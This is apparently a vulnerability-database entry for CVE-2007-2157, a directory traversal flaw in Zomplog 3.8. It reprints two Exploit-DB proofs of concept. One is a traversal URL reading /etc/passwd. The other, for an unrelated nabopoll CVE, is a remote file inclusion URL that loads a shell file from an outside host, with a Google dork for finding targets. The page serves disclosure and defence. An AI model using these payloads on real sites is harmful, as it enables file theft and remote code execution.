CVE-2007-2157
published 2007-04-19CVE-2007-2157: Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the file…
PriorityP339high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
3.51%
87.7th percentile
Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zomplog | zomplog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Zomplog 3.8 - 'force_download.php' Remote File Disclosure
exploitdb·2007-04-18
CVE-2007-2157 Zomplog 3.8 - 'force_download.php' Remote File Disclosure
Zomplog 3.8 - 'force_download.php' Remote File Disclosure
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Zomplog v3.8 +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote File Disclosure Vulnerability +
+ Download....: www.zomp.nl/zomplog +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: http://[Target]/[Path]/upload/force_download.php?file=[Local Path] +
+ E.g.........: http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd +
+ +
# milw0rm.com [2007-04-18]
Exploit-DB
nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
exploitdb·2007-02-15
CVE-2005-2157 nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
---
By Cr@zy_King
[email protected]
Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim
Script : nabopoll 1.x
Risk : Remote File .nclude | High
Site : http://nabocorp.com/
Google Dork : inurl:"nabopoll/"
Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");
Files: survey.inc.php
Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?
Ayyildiz.Org Present
# milw0rm.com [2007-02-15]
No writeups or analysis indexed.
http://osvdb.org/35016http://secunia.com/advisories/24899http://www.securityfocus.com/bid/23553http://www.vupen.com/english/advisories/2007/1449https://exchange.xforce.ibmcloud.com/vulnerabilities/33740https://www.exploit-db.com/exploits/3764http://osvdb.org/35016http://secunia.com/advisories/24899http://www.securityfocus.com/bid/23553http://www.vupen.com/english/advisories/2007/1449https://exchange.xforce.ibmcloud.com/vulnerabilities/33740https://www.exploit-db.com/exploits/3764
2007-04-19
Published